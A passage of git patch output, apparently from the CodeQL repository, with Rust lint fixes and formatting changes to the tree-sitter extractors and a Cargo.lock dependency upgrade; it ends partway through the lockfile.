cc::Build::new(); - c_config.include(&src_dir); + c_config.include(src_dir); c_config .flag_if_supported("-Wno-unused-parameter") .flag_if_supported("-Wno-unused-but-set-variable") @@ -17,7 +17,7 @@ fn main() { let mut cpp_config = cc::Build::new(); cpp_config.cpp(true); - cpp_config.include(&src_dir); + cpp_config.include(src_dir); cpp_config .flag_if_supported("-Wno-unused-parameter") .flag_if_supported("-Wno-unused-but-set-variable"); diff --git a/python/extractor/tsg-python/tsp/bindings/rust/lib.rs b/python/extractor/tsg-python/tsp/bindings/rust/lib.rs index 0d524b28d273..560277354f2a 100644 --- a/python/extractor/tsg-python/tsp/bindings/rust/lib.rs +++ b/python/extractor/tsg-python/tsp/bindings/rust/lib.rs @@ -43,18 +43,18 @@ pub fn language() -> Language { } /// The source of the Python tree-sitter grammar description. -pub const GRAMMAR: &'static str = include_str!("../../grammar.js"); +pub const GRAMMAR: &str = include_str!("../../grammar.js"); /// The syntax highlighting query for this language. -pub const HIGHLIGHT_QUERY: &'static str = include_str!("../../queries/highlights.scm"); +pub const HIGHLIGHT_QUERY: &str = include_str!("../../queries/highlights.scm"); /// The content of the [`node-types.json`][] file for this grammar. /// /// [`node-types.json`]: https://tree-sitter.github.io/tree-sitter/using-parsers#static-node-types -pub const NODE_TYPES: &'static str = include_str!("../../src/node-types.json"); +pub const NODE_TYPES: &str = include_str!("../../src/node-types.json"); /// The symbol tagging query for this language. -pub const TAGGING_QUERY: &'static str = include_str!("../../queries/tags.scm"); +pub const TAGGING_QUERY: &str = include_str!("../../queries/tags.scm"); #[cfg(test)] mod tests { diff --git a/ruby/extractor/src/extractor.rs b/ruby/extractor/src/extractor.rs index f1c272f17927..d42713122263 100644 --- a/ruby/extractor/src/extractor.rs +++ b/ruby/extractor/src/extractor.rs @@ -99,7 +99,7 @@ pub fn run(options: Options) -> std::io::Result<()> { let mut needs_conversion = false; let code_ranges; let mut trap_writer = trap::Writer::new(); - if path.extension().map_or(false, |x| x == "erb") { + if path.extension().is_some_and(|x| x == "erb") { tracing::info!("scanning: {}", path.display()); extractor::extract( &erb, @@ -371,59 +371,59 @@ fn test_scan_coding_comment() { assert_eq!(result, Some("utf-8".into())); let text = "#coding:utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "# foo\n# encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, None); let text = "# encoding: latin1 encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("latin1".into())); let text = "# encoding: nonsense"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("nonsense".into())); let text = "# coding = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "# CODING = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "# CoDiNg = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "# blah blahblahcoding = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); // unicode BOM is ignored let text = "\u{FEFF}# encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "\u{FEFF} # encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "#! /usr/bin/env ruby\n # encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "\u{FEFF}#! /usr/bin/env ruby\n # encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); // A #! must be the first thing on a line, otherwise it's a normal comment let text = " #! /usr/bin/env ruby encoding = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = " #! /usr/bin/env ruby \n # encoding = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, None); } diff --git a/shared/tree-sitter-extractor/src/diagnostics.rs b/shared/tree-sitter-extractor/src/diagnostics.rs index f4d6d75a79c5..781a24797d5f 100644 --- a/shared/tree-sitter-extractor/src/diagnostics.rs +++ b/shared/tree-sitter-extractor/src/diagnostics.rs @@ -124,7 +124,7 @@ impl LogWriter { match std::fs::OpenOptions::new() .create(true) .append(true) - .write(true) + .open(path) { Err(e) => { diff --git a/shared/tree-sitter-extractor/src/generator/dbscheme.rs b/shared/tree-sitter-extractor/src/generator/dbscheme.rs index 67af94a4dab8..fd690f57a72f 100644 --- a/shared/tree-sitter-extractor/src/generator/dbscheme.rs +++ b/shared/tree-sitter-extractor/src/generator/dbscheme.rs @@ -48,7 +48,7 @@ pub enum DbColumnType { String, } -impl<'a> fmt::Display for Case<'a> { +impl fmt::Display for Case<'_> { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { writeln!(f, "case @{}.{} of", &self.name, &self.column)?; let mut sep = " "; @@ -60,7 +60,7 @@ impl<'a> fmt::Display for Case<'a> { } } -impl<'a> fmt::Display for Table<'a> { +impl fmt::Display for Table<'_> { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { if let Some(keyset) = &self.keysets { write!(f, "#keyset[")?; @@ -102,7 +102,7 @@ impl<'a> fmt::Display for Table<'a> { } } -impl<'a> fmt::Display for Union<'a> { +impl fmt::Display for Union<'_> { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "@{} = ", self.name)?; let mut first = true; diff --git a/shared/tree-sitter-extractor/src/generator/ql.rs b/shared/tree-sitter-extractor/src/generator/ql.rs index 5dfc2ec84069..8e899462ac39 100644 --- a/shared/tree-sitter-extractor/src/generator/ql.rs +++ b/shared/tree-sitter-extractor/src/generator/ql.rs @@ -8,7 +8,7 @@ pub enum TopLevel<'a> { Module(Module<'a>), } -impl<'a> fmt::Display for TopLevel<'a> { +impl fmt::Display for TopLevel<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { TopLevel::Import(imp) => write!(f, "{}", imp), @@ -24,7 +24,7 @@ pub struct Import<'a> { pub alias: Option<&'a str>, } -impl<'a> fmt::Display for Import<'a> { +impl fmt::Display for Import<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "import {}", &self.module)?; if let Some(name) = &self.alias { @@ -43,7 +43,7 @@ pub struct Class<'a> { pub predicates: Vec>, } -impl<'a> fmt::Display for Class<'a> { +impl fmt::Display for Class<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if let Some(qldoc) = &self.qldoc { write!(f, "/** {} */", qldoc)?; @@ -93,7 +93,7 @@ pub struct Module<'a> { pub body: Vec>, } -impl<'a> fmt::Display for Module<'a> { +impl fmt::Display for Module<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if let Some(qldoc) = &self.qldoc { write!(f, "/** {} */", qldoc)?; @@ -122,7 +122,7 @@ pub enum Type<'a> { Normal(&'a str), } -impl<'a> fmt::Display for Type<'a> { +impl fmt::Display for Type<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { Type::Int => write!(f, "int"), @@ -152,7 +152,7 @@ pub enum Expression<'a> { }, } -impl<'a> fmt::Display for Expression<'a> { +impl fmt::Display for Expression<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { Expression::Var(x) => write!(f, "{}", x), @@ -246,7 +246,7 @@ pub struct Predicate<'a> { pub body: Expression<'a>, } -impl<'a> fmt::Display for Predicate<'a> { +impl fmt::Display for Predicate<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if let Some(qldoc) = &self.qldoc { write!(f, "/** {} */", qldoc)?; @@ -280,7 +280,7 @@ pub struct FormalParameter<'a> { pub param_type: Type<'a>, } -impl<'a> fmt::Display for FormalParameter<'a> { +impl fmt::Display for FormalParameter<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{} {}", self.param_type, self.name) } diff --git a/shared/tree-sitter-extractor/src/trap.rs b/shared/tree-sitter-extractor/src/trap.rs index 4c061f8dbd82..4ad1e48eb6ba 100644 --- a/shared/tree-sitter-extractor/src/trap.rs +++ b/shared/tree-sitter-extractor/src/trap.rs @@ -25,6 +25,12 @@ pub struct Writer { location_labels: std::collections::HashMap, } +impl Default for Writer { + fn default() -> Self { + Self::new() + } +} + impl Writer { pub fn new() -> Writer { Writer { @@ -306,9 +312,9 @@ impl Compression { #[test] fn limit_string_test() { - assert_eq!("hello", limit_string(&"hello world".to_owned(), 5)); - assert_eq!("hi ☹", limit_string(&"hi ☹☹".to_owned(), 6)); - assert_eq!("hi ", limit_string(&"hi ☹☹".to_owned(), 5)); + assert_eq!("hello", limit_string("hello world", 5)); + assert_eq!("hi ☹", limit_string("hi ☹☹", 6)); + assert_eq!("hi ", limit_string("hi ☹☹", 5)); } #[test] diff --git a/shared/tree-sitter-extractor/tests/common/mod.rs b/shared/tree-sitter-extractor/tests/common/mod.rs index f60f575a0a27..9871ae401c05 100644 --- a/shared/tree-sitter-extractor/tests/common/mod.rs +++ b/shared/tree-sitter-extractor/tests/common/mod.rs @@ -28,7 +28,7 @@ pub fn create_source_dir(files: Vec<(&'static str, &'static str)>) -> SourceArch let path = source_archive_dir.join(filename); let mut file = File::create(&path).unwrap(); file.write_all(contents.as_bytes()).unwrap(); - file_paths.push(PathBuf::from(path)); + file_paths.push(path); } let file_list = { @@ -69,5 +69,5 @@ pub fn expect_trap_file(root_dir: &Path, filename: &str) { fn create_dir(root: &Path, path: impl AsRef) -> PathBuf { let full_path = root.join(path); std::fs::create_dir_all(&full_path).expect("Failed to create directory"); - full_path.into() + full_path } diff --git a/shared/tree-sitter-extractor/tests/integration_test.rs b/shared/tree-sitter-extractor/tests/integration_test.rs index 34d475df5d01..7a6b4945d5d2 100644 --- a/shared/tree-sitter-extractor/tests/integration_test.rs +++ b/shared/tree-sitter-extractor/tests/integration_test.rs @@ -1,7 +1,6 @@ use codeql_extractor::extractor::simple; use codeql_extractor::trap; -use tree_sitter_ql; mod common; use common::{SourceArchive, create_source_dir, expect_trap_file}; diff --git a/shared/tree-sitter-extractor/tests/multiple_languages.rs b/shared/tree-sitter-extractor/tests/multiple_languages.rs index 766de2bc7820..2e45e56754a3 100644 --- a/shared/tree-sitter-extractor/tests/multiple_languages.rs +++ b/shared/tree-sitter-extractor/tests/multiple_languages.rs @@ -1,6 +1,5 @@ use codeql_extractor::extractor::simple; use codeql_extractor::trap; -use tree_sitter_ql; mod common; use common::{SourceArchive, create_source_dir, expect_trap_file}; From d2105a75284b2c578a14cd40d88846b57f24eb26 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:29:42 +0100 Subject: [PATCH 029/892] Shared: format code again --- shared/tree-sitter-extractor/src/diagnostics.rs | 1 - shared/tree-sitter-extractor/tests/integration_test.rs | 1 - 2 files changed, 2 deletions(-) diff --git a/shared/tree-sitter-extractor/src/diagnostics.rs b/shared/tree-sitter-extractor/src/diagnostics.rs index 781a24797d5f..3c41b85425e7 100644 --- a/shared/tree-sitter-extractor/src/diagnostics.rs +++ b/shared/tree-sitter-extractor/src/diagnostics.rs @@ -124,7 +124,6 @@ impl LogWriter { match std::fs::OpenOptions::new() .create(true) .append(true) - .open(path) { Err(e) => { diff --git a/shared/tree-sitter-extractor/tests/integration_test.rs b/shared/tree-sitter-extractor/tests/integration_test.rs index 7a6b4945d5d2..2b243ff7945b 100644 --- a/shared/tree-sitter-extractor/tests/integration_test.rs +++ b/shared/tree-sitter-extractor/tests/integration_test.rs @@ -1,7 +1,6 @@ use codeql_extractor::extractor::simple; use codeql_extractor::trap; - mod common; use common::{SourceArchive, create_source_dir, expect_trap_file}; From 83e442a2667db742beae6bca80b9ed223159fc2f Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:23:49 +0100 Subject: [PATCH 030/892] Rust/Ruby: run `cargo upgrade --incompatible --pinned` --- Cargo.lock | 435 +++++++++++++----------- rust/ast-generator/Cargo.toml | 8 +- rust/extractor/Cargo.toml | 38 +-- rust/extractor/macros/Cargo.toml | 2 +- shared/tree-sitter-extractor/Cargo.toml | 4 +- 5 files changed, 268 insertions(+), 219 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 48aa23d25ea3..fc646d201d66 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -1,6 +1,6 @@ # This file is automatically @generated by Cargo. # It is not intended for manual editing. -version = 3 +version = 4 [[package]] name = "adler2" @@ -82,19 +82,20 @@ dependencies = [ [[package]] name = "anstyle-wincon" -version = "3.0.6" +version = "3.0.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2109dbce0e72be3ec00bed26e6a7479ca384ad226efdd66db8fa2e3a38c83125" +checksum = "ca3534e77181a9cc07539ad51f2141fe32f6c3ffd4df76db8ad92346b003ae4e" dependencies = [ "anstyle", + "once_cell", "windows-sys 0.59.0", ] [[package]] name = "anyhow" -version = "1.0.95" +version = "1.0.96" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34ac096ce696dc2fcabef30516bb13c0a68a11d30131d3df6f04711467681b04" +checksum = "6b964d184e89d9b6b67dd2715bc8e74cf3107fb2b529990c90cf517326150bf4" [[package]] name = "argfile" @@ -156,9 +157,9 @@ checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a" [[package]] name = "bitflags" -version = "2.7.0" +version = "2.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1be3f42a67d6d345ecd59f675f3f012d6974981560836e938c22b424b85ce1be" +checksum = "8f68f53c83ab957f72c32642f3868eec03eb974d1fb82e453128456482613d36" [[package]] name = "borsh" @@ -252,9 +253,9 @@ checksum = "613afe47fcd5fac7ccf1db93babcb082c5994d996f20b8b159f2ad1658eb5724" [[package]] name = "chalk-derive" -version = "0.98.0" +version = "0.99.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9426c8fd0fe61c3da880b801d3b510524df17843a8f9ec1f5b9cec24fb7412df" +checksum = "572583d9b97f9d277e5c7607f8239a30e2e04d3ed3b47c87d1cb2152ae724073" dependencies = [ "proc-macro2", "quote", @@ -264,19 +265,19 @@ dependencies = [ [[package]] name = "chalk-ir" -version = "0.98.0" +version = "0.99.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d5f2eb1cd6054da221bd1ac0197fb2fe5e2caf3dcb93619398fc1433f8f09093" +checksum = "e60e0ef9c81dce1336a9ed3c76f08775f5b623151d96d85ba45f7b10de76d1c7" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", "chalk-derive", ] [[package]] name = "chalk-recursive" -version = "0.98.0" +version = "0.99.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "129dc03458f71cfb9c3cd621c9c68166a94e87b85b16ccd29af015d7ff9a1c61" +checksum = "5a06350d614e22b03a69b8105e3541614450a7ea48bc58ecc6c6bd92731a3995" dependencies = [ "chalk-derive", "chalk-ir", @@ -287,9 +288,9 @@ dependencies = [ [[package]] name = "chalk-solve" -version = "0.98.0" +version = "0.99.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d7e8a8c1e928f98cdf227b868416ef21dcd8cc3c61b347576d783713444d41c8" +checksum = "0e428761e9b55bee516bfe2457caed8b6d1b86353f92ae825bbe438a36ce91e8" dependencies = [ "chalk-derive", "chalk-ir", @@ -318,9 +319,9 @@ dependencies = [ [[package]] name = "clap" -version = "4.5.26" +version = "4.5.31" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8eb5e908ef3a6efbe1ed62520fb7287959888c88485abe072543190ecc66783" +checksum = "027bb0d98429ae334a8698531da7077bdf906419543a35a55c2cb1b66437d767" dependencies = [ "clap_builder", "clap_derive", @@ -328,9 +329,9 @@ dependencies = [ [[package]] name = "clap_builder" -version = "4.5.26" +version = "4.5.31" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "96b01801b5fc6a0a232407abc821660c9c6d25a1cafc0d4f85f29fb8d9afc121" +checksum = "5589e0cba072e0f3d23791efac0fd8627b49c829c196a492e88168e6a669d863" dependencies = [ "anstream", "anstyle", @@ -340,9 +341,9 @@ dependencies = [ [[package]] name = "clap_derive" -version = "4.5.24" +version = "4.5.28" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "54b755194d6389280185988721fffba69495eed5ee9feeee9a599b53db80318c" +checksum = "bf4ced95c6f4a675af3da73304b9ac4ed991640c36374e4b46795c49e17cf1ed" dependencies = [ "heck 0.5.0", "proc-macro2", @@ -580,9 +581,9 @@ checksum = "92773504d58c093f6de2459af4af33faa518c13451eb8f2b5698ed3d36e7c813" [[package]] name = "either" -version = "1.13.0" +version = "1.14.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "60b1af1c220855b6ceac025d3f6ecdd2b7c4894bfe9cd9bda4fbb4bc7c0d4cf0" +checksum = "b7914353092ddf589ad78f25c5c1c21b7f80b0ff8621e7c814c3485b5306da9d" [[package]] name = "ena" @@ -590,7 +591,7 @@ version = "0.14.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3d248bdd43ce613d87415282f69b9bb99d947d290b10962dd6c56233312c2ad5" dependencies = [ - "log 0.4.22", + "log 0.4.25", ] [[package]] @@ -697,9 +698,9 @@ checksum = "0ce7134b9999ecaf8bcd65542e436736ef32ddca1b3e06094cb6ec5755203b80" [[package]] name = "flate2" -version = "1.0.35" +version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c936bfdafb507ebbf50b8074c54fa31c5be9a1e7e5f467dd659697041407d07c" +checksum = "11faaf5a5236997af9848be0bef4db95824b1d534ebc64d0f0c6cf3e67bd38dc" dependencies = [ "crc32fast", "miniz_oxide", @@ -737,13 +738,14 @@ checksum = "7ab85b9b05e3978cc9a9cf8fea7f01b494e1a09ed3037e16ba39edc7a29eb61a" [[package]] name = "getrandom" -version = "0.2.15" +version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c4567c8db10ae91089c99af84c68c38da3ec2f087c3f82960bcdbf3656b6f4d7" +checksum = "43a49c392881ce6d5c3b8cb70f98717b7c07aabbdff06687b9030dbfbe2725f8" dependencies = [ "cfg-if", "libc", - "wasi", + "wasi 0.13.3+wasi-0.2.2", + "windows-targets 0.52.6", ] [[package]] @@ -760,7 +762,7 @@ checksum = "15f1ce686646e7f1e19bf7d5533fe443a45dbfb990e00629110797578b42fb19" dependencies = [ "aho-corasick", "bstr", - "log 0.4.22", + "log 0.4.25", "regex-automata 0.4.9", "regex-syntax 0.8.5", ] @@ -875,11 +877,11 @@ checksum = "c8fae54786f62fb2918dcfae3d568594e50eb9b5c25bf04371af6fe7516452fb" [[package]] name = "inotify" -version = "0.9.6" +version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8069d3ec154eb856955c1c0fbffefbf5f3c40a104ec912d4797314c1801abff" +checksum = "f37dccff2791ab604f9babef0ba14fbe0be30bd368dc541e2b08d07c8aa908f3" dependencies = [ - "bitflags 1.3.2", + "bitflags 2.8.0", "inotify-sys", "libc", ] @@ -983,7 +985,7 @@ version = "0.1.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c0ff37bd590ca25063e35af745c343cb7a0271906fb7b37e4813e8f79f00268d" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", "libc", "redox_syscall", ] @@ -1014,14 +1016,14 @@ version = "0.3.9" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e19e8d5c34a3e0e2223db8e060f9e8264aeeb5c5fc64a4ee9965c062211c024b" dependencies = [ - "log 0.4.22", + "log 0.4.25", ] [[package]] name = "log" -version = "0.4.22" +version = "0.4.25" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a7a70ba024b9dc04c27ea2f0c0548feb474ec5c54bba33a7f72f873a39d07b24" +checksum = "04cbf5b083de1c7e0222a7a51dbfdba1cbe1c6ab0b15e29fff3f6c077fd9cd9f" [[package]] name = "lz4_flex" @@ -1055,23 +1057,23 @@ dependencies = [ [[package]] name = "miniz_oxide" -version = "0.8.2" +version = "0.8.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4ffbe83022cedc1d264172192511ae958937694cd57ce297164951b8b3568394" +checksum = "8e3e04debbb59698c15bacbb6d93584a8c0ca9cc3213cb423d31f760d8843ce5" dependencies = [ "adler2", ] [[package]] name = "mio" -version = "0.8.11" +version = "1.0.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a4a650543ca06a924e8b371db273b2756685faae30f8487da1b56505a8f78b0c" +checksum = "2886843bf800fba2e3377cff24abf6379b4c4d5c6681eaf9ea5b0d15090450bd" dependencies = [ "libc", - "log 0.4.22", - "wasi", - "windows-sys 0.48.0", + "log 0.4.25", + "wasi 0.11.0+wasi-snapshot-preview1", + "windows-sys 0.52.0", ] [[package]] @@ -1101,23 +1103,29 @@ checksum = "2bf50223579dc7cdcfb3bfcacf7069ff68243f8c363f62ffa99cf000a6b9c451" [[package]] name = "notify" -version = "6.1.1" +version = "8.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6205bd8bb1e454ad2e27422015fb5e4f2bcc7e08fa8f27058670d208324a4d2d" +checksum = "2fee8403b3d66ac7b26aee6e40a897d85dc5ce26f44da36b8b73e987cc52e943" dependencies = [ - "bitflags 2.7.0", - "crossbeam-channel", + "bitflags 2.8.0", "filetime", "fsevent-sys", "inotify", "kqueue", "libc", - "log 0.4.22", + "log 0.4.25", "mio", + "notify-types", "walkdir", - "windows-sys 0.48.0", + "windows-sys 0.59.0", ] +[[package]] +name = "notify-types" +version = "2.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5e0826a989adedc2a244799e823aece04662b66609d96af8dff7ac6df9a8925d" + [[package]] name = "nu-ansi-term" version = "0.46.0" @@ -1155,9 +1163,9 @@ dependencies = [ [[package]] name = "once_cell" -version = "1.20.2" +version = "1.20.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1261fe7e33c73b354eab43b1273a57c8f967d0391e80353e51f764ac02cf6775" +checksum = "945462a4b81e43c4e3ba96bd7b49d834c6f61198356aa858733bc4acf3cbe62e" [[package]] name = "oorandom" @@ -1273,7 +1281,7 @@ version = "0.2.20" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "77957b295656769bb8ad2b6a6b09d897d94f05c41b069aede1fcdaa675eaea04" dependencies = [ - "zerocopy", + "zerocopy 0.7.35", ] [[package]] @@ -1309,20 +1317,30 @@ dependencies = [ [[package]] name = "ra-ap-rustc_abi" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "28b782af0a7a8df16ddf43cd70da9f17bc3b1ce712c9e4992b6edb16f5f53632" +checksum = "3829c3355d1681ffeaf1450ec71edcdace6820fe2e86469d8fc1ad45e2c96460" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", + "ra-ap-rustc_hashes", "ra-ap-rustc_index", "tracing", ] +[[package]] +name = "ra-ap-rustc_hashes" +version = "0.97.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1bd4d6d4c434bec08e02370a4f64a4985312097215a62e82d0f757f3a98e502e" +dependencies = [ + "rustc-stable-hash", +] + [[package]] name = "ra-ap-rustc_index" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ce5742f134960482f543b35ecebec3cacc6d79a9a685713518b4d8d70c5f9aa8" +checksum = "bad6fc4bd7522e31096e2de5b0351144fe0684b608791ee26c842bf2da1b19ae" dependencies = [ "ra-ap-rustc_index_macros", "smallvec", @@ -1330,9 +1348,9 @@ dependencies = [ [[package]] name = "ra-ap-rustc_index_macros" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d7ea011fcf68309a8835ad01d91c032cb18444617b00e2cab21d45b208164441" +checksum = "cfb234e1f84b92be45276c3025bee18789e9bc95bec8789bec961e78edb01c52" dependencies = [ "proc-macro2", "quote", @@ -1341,19 +1359,20 @@ dependencies = [ [[package]] name = "ra-ap-rustc_lexer" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eb76f0a4d4c20859e41f0a23bff0f37ab9ca9171c214a6c7dd72ea69434865dc" +checksum = "7a3a40bd11dc43d1cb110e730b80620cf8102f4cca8920a02b65954da0ed931f" dependencies = [ + "memchr", "unicode-properties", "unicode-xid", ] [[package]] name = "ra-ap-rustc_parse_format" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "06080bd35078305421a62da77f3c128482d8d44441b6da8ce9d146d1cd9cdb5b" +checksum = "5feb877478994cb4c0c0c7a5116a352eefc0634aefc8636feb00a893fa5b7135" dependencies = [ "ra-ap-rustc_index", "ra-ap-rustc_lexer", @@ -1361,12 +1380,12 @@ dependencies = [ [[package]] name = "ra-ap-rustc_pattern_analysis" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "68a3154fe4c20c177d7b3c678a2d3a97aba0cca156ddef88959915041889daf0" +checksum = "a76774d35934d464c4115908cde16f76a4f7e540fe1eea6b79336c556e37bdd3" dependencies = [ "ra-ap-rustc_index", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "rustc_apfloat", "smallvec", "tracing", @@ -1374,9 +1393,9 @@ dependencies = [ [[package]] name = "ra_ap_base_db" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "548b95b278a8f6f888a0bb6cb7bf4201fe920d3800cd99770054e5eb72f3cd6a" +checksum = "5d8e4a327f1a8ace5afced54ebaa1a34f8cf0bb535a28aefb8300e8ea49a7d6e" dependencies = [ "la-arena", "lz4_flex", @@ -1387,7 +1406,7 @@ dependencies = [ "ra_ap_stdx", "ra_ap_syntax", "ra_ap_vfs", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "semver", "tracing", "triomphe", @@ -1395,30 +1414,31 @@ dependencies = [ [[package]] name = "ra_ap_cfg" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "921e2b0232d1e8352eb9f476bb55c1d8bcbed0531adc17c74aa711fef015c851" +checksum = "4d974450788b1f90243c5f2231875ed4d7087444975c0190a1c2cb02c3ed465d" dependencies = [ "ra_ap_intern", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", ] [[package]] name = "ra_ap_edition" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a7cc6633305d878cafb4a4482e7e7002d1a5d7b15fa837728b6613ff5336f8a4" +checksum = "c3b1b961a84cb09a4e06e44d06b2e77bcf546d0c2623df9545ba9cc694880989" [[package]] name = "ra_ap_hir" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e3f6b31381a297e5bb4fa76108a2cf7bf8d35067a130f932aa6fdfb733ba3a1" +checksum = "ff0672e35a6cf12333cb6b9e3fd18aba4bc724fa7c7b24c3253df4730be1f9c3" dependencies = [ "arrayvec", "either", + "indexmap 2.7.0", "itertools 0.12.1", "ra_ap_base_db", "ra_ap_cfg", @@ -1430,7 +1450,7 @@ dependencies = [ "ra_ap_stdx", "ra_ap_syntax", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smallvec", "tracing", "triomphe", @@ -1438,12 +1458,12 @@ dependencies = [ [[package]] name = "ra_ap_hir_def" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "84144bdda7af170e660d312982889622f4a5361c1bb74df2afa2a6ce17d48644" +checksum = "fde2fb9361257e31e73e63eb2d07445ea3fd4cd1e7bae7f45e7ba82bcfcde29a" dependencies = [ "arrayvec", - "bitflags 2.7.0", + "bitflags 2.8.0", "cov-mark", "dashmap", "drop_bomb", @@ -1454,18 +1474,18 @@ dependencies = [ "itertools 0.12.1", "la-arena", "ra-ap-rustc_abi", + "ra-ap-rustc_hashes", "ra-ap-rustc_parse_format", "ra_ap_base_db", "ra_ap_cfg", "ra_ap_hir_expand", "ra_ap_intern", - "ra_ap_limit", "ra_ap_mbe", "ra_ap_span", "ra_ap_stdx", "ra_ap_syntax", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "rustc_apfloat", "smallvec", "text-size", @@ -1475,9 +1495,9 @@ dependencies = [ [[package]] name = "ra_ap_hir_expand" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "441661b394acfa4f3ac4cb54386f8ee8b451504ec167b0bf0e4200da1bbca50d" +checksum = "1823b649710bf1829c894f774dfe66acb33a3e5bc7409ff7836cd19f6e09c250" 